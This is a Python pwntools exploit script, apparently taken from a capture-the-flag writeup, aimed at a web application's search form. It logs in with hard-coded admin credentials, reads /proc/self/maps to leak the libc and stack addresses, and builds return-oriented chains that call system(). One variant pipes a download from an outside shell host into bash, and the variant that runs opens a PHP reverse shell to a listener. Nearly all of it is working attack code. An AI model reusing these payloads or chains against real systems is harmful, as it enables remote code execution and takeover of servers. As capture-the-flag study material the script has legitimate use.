```python  
from pwn import *  
import requests,re

# One HTTP session for every request below, so any cookies the server sets
# in response to login() are sent with the later requests.
session = requests.Session()

# Base URL of the challenge web application (value as given in the writeup).
url = "http://134.175.185.244"

# Local libc image loaded with pwntools; symbol offsets (e.g. system) are
# resolved from it once libc.address has been set to the leaked base.
# Presumably the same build the target maps -- verify.
libc = ELF("./libc.so")

def login():
    """Authenticate the shared session against /index.php.

    Posts the hard-coded admin credentials from the writeup; the response
    is discarded, so a failed login is not detected here.
    """
    credentials = {"password":"goodlucktoyou","submit":"submit","username":"admin"}
    login_endpoint = url+"/index.php"
    session.post(login_endpoint, data=credentials)

def send(payload):
    """Submit `payload` as the `search` field of /select.php and return the echo.

    Returns the first capture between the closing form tag and the next
    <br> in the response body; raises IndexError when nothing matches.

    NOTE(review): a str pattern is applied to response.content, which
    suggests Python 2 string semantics -- confirm.
    """
    form_fields = {"submit":"submit","search":payload}
    reply = session.post(url+"/select.php", data=form_fields)
    echoed = re.findall('\<\/form\>(.*?)\<br\>',reply.content)
    return echoed[0]

def read(payload):
    """Submit `payload` as the `search` field and return a slice of the raw body.

    The slice starts at 1517 + len(payload) and drops the final byte.
    1517 is a hard-coded offset; presumably the length of the page markup
    that precedes the returned data -- it is tied to this exact page layout.
    """
    form_fields = {"submit":"submit","search":payload}
    reply = session.post(url+"/select.php", data=form_fields)
    body_start = 1517+len(payload)
    return reply.content[body_start:-1]

login()

# leak libc and stack
# The text in front of the first "libc-2.28" in the returned /proc/self/maps
# data is taken, and its first 12 characters are parsed as the hex base
# address. This assumes the first match is libc's lowest mapping.
maps_dump = read("/proc/self/maps")
libc_line_prefix = re.findall('(.*?)libc-2.28',maps_dump)[0]
libc.address = int('0x'+libc_line_prefix[:12],16)

# A 0x64-byte filler is sent; whatever the page echoes after those 0x64 bytes
# is zero-padded to 8 bytes and unpacked as a little-endian 64-bit value.
# Presumably an adjacent stack pointer disclosed because the filler is not
# NUL-terminated on the server side -- not shown here.
echo_tail = send('a'*0x64)[0x64:]
stack = u64(echo_tail.ljust(8, b'\0'))

log.warn("stack: "+hex(stack))
log.warn("libc: "+hex(libc.address))

# gadget
# Absolute addresses of two code sequences inside libc, computed from the
# leaked base. The offsets are specific to the libc build loaded above; the
# names suggest "pop rdi; ret" and "four pops; ret" -- verify against the binary.
pop_rdi, pop4_ret = [libc.address + offset for offset in (0x023a5f, 0x024568)]

def attack1():
    """Send the overflow payload that places the command after the return chain.

    Layout as built here: 0x88 filler bytes, three 8-byte values (pop_rdi,
    stack+0xa0, system), then the NUL-terminated command string.
    Presumably 0x88 is the distance to the saved return address and
    stack+0xa0 is where the command string lands -- neither is shown here.

    Not invoked by this script; only attack2() is called.
    On the host, the visible effect would be the web-server process starting
    a shell that pipes curl output into bash.
    """
    filler = "a"*0x88
    call_system = p64(pop_rdi) + p64(stack+0xa0) + p64(libc.symbols['system'])
    # x.x.x.x:8888 is the writeup's placeholder for the listener address.
    command = "curl https://shell.now.sh/x.x.x.x:8888|bash\x00"
    send(filler + call_system + command)

def attack2():
    """Send the overflow payload that places the command at the buffer start.

    Layout as built here: the NUL-terminated command space-padded to 0x88
    bytes, a run of ten pop_rdi values, pop4_ret and four zero qwords, then
    pop_rdi, `stack`, system. Presumably `stack` is the address of the
    buffer start and the first run only advances the stack pointer before
    the final call -- confirm against the target binary.

    On the host, the visible effect would be the web-server process starting
    `php -r` with an outbound socket attached to an interactive bash.
    """
    # NOTE(review): literal rejoined from a hard-wrapped line; the break is
    # assumed to stand for the single space before "2>&3".
    command = "php -r '$sock=fsockopen(\"x.x.x.x\",8888);exec(\"bash -i <&3 >&3 2>&3\");'\x00"
    padded_command = command.ljust(0x88)
    spacer_chain = p64(pop_rdi)*10+p64(pop4_ret)+p64(0)*4
    call_system = p64(pop_rdi)+p64(stack)+p64(libc.symbols['system'])
    send(padded_command + spacer_chain + call_system)

# Only the second variant is run; attack1() is defined above but never called.
attack2()  
```

[Original writeup](https://xuanxuanblingbling.github.io/ctf/pwn/2020/05/05/mixture/).